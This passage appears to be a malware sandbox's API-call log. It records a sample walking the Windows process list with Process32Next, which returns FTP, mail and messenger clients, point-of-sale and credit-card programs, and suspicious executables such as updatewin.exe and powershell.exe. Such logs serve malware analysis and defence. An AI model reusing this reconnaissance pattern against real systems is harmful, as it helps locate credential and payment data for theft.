hSnapshot=0x344, lppe=0x18d7e4 | out: lppe=0x18d7e4*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x5ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="3dftp.exe")) returned 1 [0136.351] Process32Next (in: hSnapshot=0x344, lppe=0x18d7e4 | out: lppe=0x18d7e4*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="absolutetelnet.exe")) returned 1 [0136.352] Process32Next (in: hSnapshot=0x344, lppe=0x18d7e4 | out: lppe=0x18d7e4*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x24c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="alftp.exe")) returned 1 [0136.352] Process32Next (in: hSnapshot=0x344, lppe=0x18d7e4 | out: lppe=0x18d7e4*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x6dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="barca.exe")) returned 1 [0136.353] Process32Next (in: hSnapshot=0x344, lppe=0x18d7e4 | out: lppe=0x18d7e4*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x734, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="bitkinex.exe")) returned 1 [0136.353] Process32Next (in: hSnapshot=0x344, lppe=0x18d7e4 | out: lppe=0x18d7e4*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x620, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="coreftp.exe")) returned 1 [0136.354] Process32Next (in: hSnapshot=0x344, lppe=0x18d7e4 | out: lppe=0x18d7e4*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xc0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="far.exe")) returned 1 [0136.354] Process32Next (in: hSnapshot=0x344, lppe=0x18d7e4 | out: lppe=0x18d7e4*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x414, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="filezilla.exe")) returned 1 [0136.355] Process32Next (in: hSnapshot=0x344, lppe=0x18d7e4 | out: lppe=0x18d7e4*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x55c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="flashfxp.exe")) returned 1 [0136.355] Process32Next (in: hSnapshot=0x344, lppe=0x18d7e4 | out: lppe=0x18d7e4*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="fling.exe")) returned 1 [0136.356] Process32Next (in: hSnapshot=0x344, lppe=0x18d7e4 | out: lppe=0x18d7e4*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x208, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="foxmailincmail.exe")) returned 1 [0136.356] Process32Next (in: hSnapshot=0x344, lppe=0x18d7e4 | out: lppe=0x18d7e4*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x484, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="gmailnotifierpro.exe")) returned 1 [0136.357] Process32Next (in: hSnapshot=0x344, lppe=0x18d7e4 | out: lppe=0x18d7e4*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="icq.exe")) returned 1 [0136.357] Process32Next (in: hSnapshot=0x344, lppe=0x18d7e4 | out: lppe=0x18d7e4*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x490, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="leechftp.exe")) returned 1 [0136.358] Process32Next (in: hSnapshot=0x344, lppe=0x18d7e4 | out: lppe=0x18d7e4*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x31c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="ncftp.exe")) returned 1 [0136.358] Process32Next (in: hSnapshot=0x344, lppe=0x18d7e4 | out: lppe=0x18d7e4*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x10c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="notepad.exe")) returned 1 [0136.358] Process32Next (in: hSnapshot=0x344, lppe=0x18d7e4 | out: lppe=0x18d7e4*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x754, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="operamail.exe")) returned 1 [0136.359] Process32Next (in: hSnapshot=0x344, lppe=0x18d7e4 | out: lppe=0x18d7e4*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x80c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="outlook.exe")) returned 1 [0136.360] Process32Next (in: hSnapshot=0x344, lppe=0x18d7e4 | out: lppe=0x18d7e4*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x81c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="pidgin.exe")) returned 1 [0136.360] Process32Next (in: hSnapshot=0x344, lppe=0x18d7e4 | out: lppe=0x18d7e4*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x82c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="scriptftp.exe")) returned 1 [0136.361] Process32Next (in: hSnapshot=0x344, lppe=0x18d7e4 | out: lppe=0x18d7e4*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x83c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="skype.exe")) returned 1 [0136.362] Process32Next (in: hSnapshot=0x344, lppe=0x18d7e4 | out: lppe=0x18d7e4*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x84c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="smartftp.exe")) returned 1 [0136.363] Process32Next (in: hSnapshot=0x344, lppe=0x18d7e4 | out: lppe=0x18d7e4*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x85c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="thunderbird.exe")) returned 1 [0136.364] Process32Next (in: hSnapshot=0x344, lppe=0x18d7e4 | out: lppe=0x18d7e4*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x86c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="trillian.exe")) returned 1 [0136.364] Process32Next (in: hSnapshot=0x344, lppe=0x18d7e4 | out: lppe=0x18d7e4*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x87c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="webdrive.exe")) returned 1 [0136.365] Process32Next (in: hSnapshot=0x344, lppe=0x18d7e4 | out: lppe=0x18d7e4*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x88c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="whatsapp.exe")) returned 1 [0136.366] Process32Next (in: hSnapshot=0x344, lppe=0x18d7e4 | out: lppe=0x18d7e4*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x89c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="winscp.exe")) returned 1 [0136.367] Process32Next (in: hSnapshot=0x344, lppe=0x18d7e4 | out: lppe=0x18d7e4*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x8ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="yahoomessenger.exe")) returned 1 [0136.367] Process32Next (in: hSnapshot=0x344, lppe=0x18d7e4 | out: lppe=0x18d7e4*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x8bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="active-charge.exe")) returned 1 [0136.368] Process32Next (in: hSnapshot=0x344, lppe=0x18d7e4 | out: lppe=0x18d7e4*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x8cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="accupos.exe")) returned 1 [0136.369] Process32Next (in: hSnapshot=0x344, lppe=0x18d7e4 | out: lppe=0x18d7e4*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x8dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="afr38.exe")) returned 1 [0136.370] Process32Next (in: hSnapshot=0x344, lppe=0x18d7e4 | out: lppe=0x18d7e4*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x8ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="aldelo.exe")) returned 1 [0136.371] Process32Next (in: hSnapshot=0x344, lppe=0x18d7e4 | out: lppe=0x18d7e4*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x8fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="ccv_server.exe")) returned 1 [0136.372] Process32Next (in: hSnapshot=0x344, lppe=0x18d7e4 | out: lppe=0x18d7e4*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x90c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="centralcreditcard.exe")) returned 1 [0136.373] Process32Next (in: hSnapshot=0x344, lppe=0x18d7e4 | out: lppe=0x18d7e4*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x91c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="creditservice.exe")) returned 1 [0136.374] Process32Next (in: hSnapshot=0x344, lppe=0x18d7e4 | out: lppe=0x18d7e4*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x92c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="edcsvr.exe")) returned 1 [0136.374] Process32Next (in: hSnapshot=0x344, lppe=0x18d7e4 | out: lppe=0x18d7e4*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x93c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="fpos.exe")) returned 1 [0136.375] Process32Next (in: hSnapshot=0x344, lppe=0x18d7e4 | out: lppe=0x18d7e4*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x94c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="isspos.exe")) returned 1 [0136.376] Process32Next (in: hSnapshot=0x344, lppe=0x18d7e4 | out: lppe=0x18d7e4*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x95c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="mxslipstream.exe")) returned 1 [0136.376] Process32Next (in: hSnapshot=0x344, lppe=0x18d7e4 | out: lppe=0x18d7e4*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x96c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="omnipos.exe")) returned 1 [0136.377] Process32Next (in: hSnapshot=0x344, lppe=0x18d7e4 | out: lppe=0x18d7e4*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x97c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="spcwin.exe")) returned 1 [0136.378] Process32Next (in: hSnapshot=0x344, lppe=0x18d7e4 | out: lppe=0x18d7e4*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x98c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="spgagentservice.exe")) returned 1 [0136.378] Process32Next (in: hSnapshot=0x344, lppe=0x18d7e4 | out: lppe=0x18d7e4*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x99c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="utg2.exe")) returned 1 [0136.379] Process32Next (in: hSnapshot=0x344, lppe=0x18d7e4 | out: lppe=0x18d7e4*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x9b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="kentucky-phrases-casual.exe")) returned 1 [0136.380] Process32Next (in: hSnapshot=0x344, lppe=0x18d7e4 | out: lppe=0x18d7e4*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x9c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="breaking.exe")) returned 1 [0136.380] Process32Next (in: hSnapshot=0x344, lppe=0x18d7e4 | out: lppe=0x18d7e4*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x9d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="enforcement_wv_transmitted.exe")) returned 1 [0136.381] Process32Next (in: hSnapshot=0x344, lppe=0x18d7e4 | out: lppe=0x18d7e4*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x9e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="friend.exe")) returned 1 [0136.382] Process32Next (in: hSnapshot=0x344, lppe=0x18d7e4 | out: lppe=0x18d7e4*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa14, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0136.382] Process32Next (in: hSnapshot=0x344, lppe=0x18d7e4 | out: lppe=0x18d7e4*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa58, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0136.383] Process32Next (in: hSnapshot=0x344, lppe=0x18d7e4 | out: lppe=0x18d7e4*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x6c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1d8, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0136.384] Process32Next (in: hSnapshot=0x344, lppe=0x18d7e4 | out: lppe=0x18d7e4*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x60c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0136.384] Process32Next (in: hSnapshot=0x344, lppe=0x18d7e4 | out: lppe=0x18d7e4*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x780, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0136.385] Process32Next (in: hSnapshot=0x344, lppe=0x18d7e4 | out: lppe=0x18d7e4*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x138, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0136.385] Process32Next (in: hSnapshot=0x344, lppe=0x18d7e4 | out: lppe=0x18d7e4*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x844, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0136.386] Process32Next (in: hSnapshot=0x344, lppe=0x18d7e4 | out: lppe=0x18d7e4*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x524, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x34c, pcPriClassBase=8, dwFlags=0x0, szExeFile="updatewin.exe")) returned 1 [0136.386] Process32Next (in: hSnapshot=0x344, lppe=0x18d7e4 | out: lppe=0x18d7e4*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x43c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xb10, pcPriClassBase=8, dwFlags=0x0, szExeFile="updatewin1.exe")) returned 1 [0136.387] Process32Next (in: hSnapshot=0x344, lppe=0x18d7e4 | out: lppe=0x18d7e4*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xaa8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x34c, pcPriClassBase=8, dwFlags=0x0, szExeFile="5.exe")) returned 1 [0136.387] Process32Next (in: hSnapshot=0x344, lppe=0x18d7e4 | out: lppe=0x18d7e4*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xab8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x43c, pcPriClassBase=8, dwFlags=0x0, szExeFile="powershell.exe")) returned 1 [0136.388] Process32Next (in: hSnapshot=0x344, lppe=0x18d7e4 | out: lppe=0x18d7e4*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xaac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x184, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0136.389] Process32Next (in: hSnapshot=0x344, lppe=0x18d7e4 | out: lppe=0x18d7e4*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x370, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0136.389] Process32Next (in: hSnapshot=0x344, lppe=0x18d7e4 | out: lppe=0x18d7e4*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xacc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x4fc, pcPriClassBase=6, dwFlags=0x0, szExeFile="OqRoSnESYXcDITEx.exe")) returned 1 [0136.390] Process32Next (in: hSnapshot=0x344, lppe=0x18d7e4 | out: lppe=0x18d7e4*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa48, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x1ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="LogonUI.exe")) returned 1 [0136.390] Process32Next (in: hSnapshot=0x344, lppe=0x18d7e4 | out: lppe=0x18d7e4*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa48, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x1ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="LogonUI.exe")) returned 0 [0136.391] CloseHandle (hObject=0x344) returned 1 [0136.391] HeapFree (in: hHeap=0x6c90000, dwFlags=0x0, lpMem=0x6c97b30 | out: hHeap=0x6c90000) returned 1 [0136.391] RtlAllocateHeap (HeapHandle=0x6c90000, Flags=0x0, Size=0x4) returned 0x6c97b30 [0136.391] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x344 [0136.395] Process32First (in: hSnapshot=0x344, lppe=0x18d7e4 | out: lppe=0x18d7e4*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0136.395] Process32Next (in: hSnapshot=0x344, lppe=0x18d7e4 | out: lppe=0x18d7e4*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x51, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0136.396] Process32Next (in: hSnapshot=0x344, lppe=0x18d7e4 | out: lppe=0x18d7e4*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0136.397] Process32Next (in: hSnapshot=0x344, lppe=0x18d7e4 | out: lppe=0x18d7e4*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0136.397] Process32Next (in: hSnapshot=0x344, lppe=0x18d7e4 | out: lppe=0x18d7e4*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0136.397] Process32Next (in: hSnapshot=0x344, lppe=0x18d7e4 | out: lppe=0x18d7e4*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0136.398] Process32Next (in: hSnapshot=0x344, lppe=0x18d7e4 | out: lppe=0x18d7e4*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0136.398] Process32Next (in: hSnapshot=0x344, lppe=0x18d7e4 | out: lppe=0x18d7e4*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0136.399] Process32Next (in: hSnapshot=0x344, lppe=0x18d7e4 | out: lppe=0x18d7e4*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0136.399] Process32Next (in: hSnapshot=0x344, lppe=0x18d7e4 | out: lppe=0x18d7e4*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0136.400] Process32Next (in: hSnapshot=0x344, lppe=0x18d7e4 | out: lppe=0x18d7e4*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x250, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0136.400] Process32Next (in: hSnapshot=0x344, lppe=0x18d7e4 | out: lppe=0x18d7e4*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x294, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0136.401] Process32Next (in: hSnapshot=0x344, lppe=0x18d7e4 | out: lppe=0x18d7e4*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x2c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x15, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0136.401] Process32Next (in: hSnapshot=0x344, lppe=0x18d7e4 | out: lppe=0x18d7e4*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x338, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x15, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0136.402] Process32Next (in: hSnapshot=0x344, lppe=0x18d7e4 | out: lppe=0x18d7e4*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x370, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x21, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0136.402] Process32Next (in: hSnapshot=0x344, lppe=0x18d7e4 | out: lppe=0x18d7e4*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x3ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x2c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0136.403] Process32Next (in: hSnapshot=0x344, lppe=0x18d7e4 | out: lppe=0x18d7e4*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xc8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0136.403] Process32Next (in: hSnapshot=0x344, lppe=0x18d7e4 | out: lppe=0x18d7e4*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x11c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0136.404] Process32Next (in: hSnapshot=0x344, lppe=0x18d7e4 | out: lppe=0x18d7e4*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x444, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x338, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0136.404] Process32Next (in: hSnapshot=0x344, lppe=0x18d7e4 | out: lppe=0x18d7e4*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x454, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x21, th32ParentProcessID=0x43c, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0136.405] Process32Next (in: hSnapshot=0x344, lppe=0x18d7e4 | out: lppe=0x18d7e4*(dwSize=0x128, cntUsage=0x0, 